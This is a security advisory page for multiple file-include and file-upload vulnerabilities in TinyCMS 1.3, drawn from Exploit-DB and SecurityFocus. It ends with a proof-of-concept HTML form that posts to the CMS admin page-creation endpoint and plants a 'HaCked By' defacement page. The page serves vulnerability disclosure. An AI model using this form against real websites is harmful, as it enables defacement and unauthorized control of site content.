TinyCMS Multiple Vulnerabilities

vendor:

TinyCMS

by:

SecurityFocus

7,5

CVSS

HIGH

Local File-Include Vulnerabilities and Arbitrary File-Upload Vulnerability

CWE

Product Name: TinyCMS

Affected Version From: TinyCMS 1.3

Affected Version To: TinyCMS 1.3

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

TinyCMS Multiple Vulnerabilities

TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.

Mitigation:

Users should ensure that the application is kept up to date with the latest security patches and that all user input is validated and sanitized.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/53761/info

TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability.

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.

TinyCMS 1.3 is vulnerable; other versions may also be affected. 

<form action='http://www.example.com/inc/functions.php?view=admin&do=pages&create=new&save=1' method='post'>
<strong>Page Title :</strong>
<input type="text" name="title" size="50" value='Happy Milw0rm 1337day !'>
<textarea id="elm1" name="page">
<center>
<h1> HaCked By KedAns-Dz </h1>
<h2> Happy Milw0rm 1337-Day All Hax0rS ^.^ </h2>
<h3> Greetings t0 KeyStr0ke + JF and All 0ld School ( The Milw0rm ) </h3>
</center>
&lt;/textarea&gt;
<input type='submit' value='Upload Page'>
</form>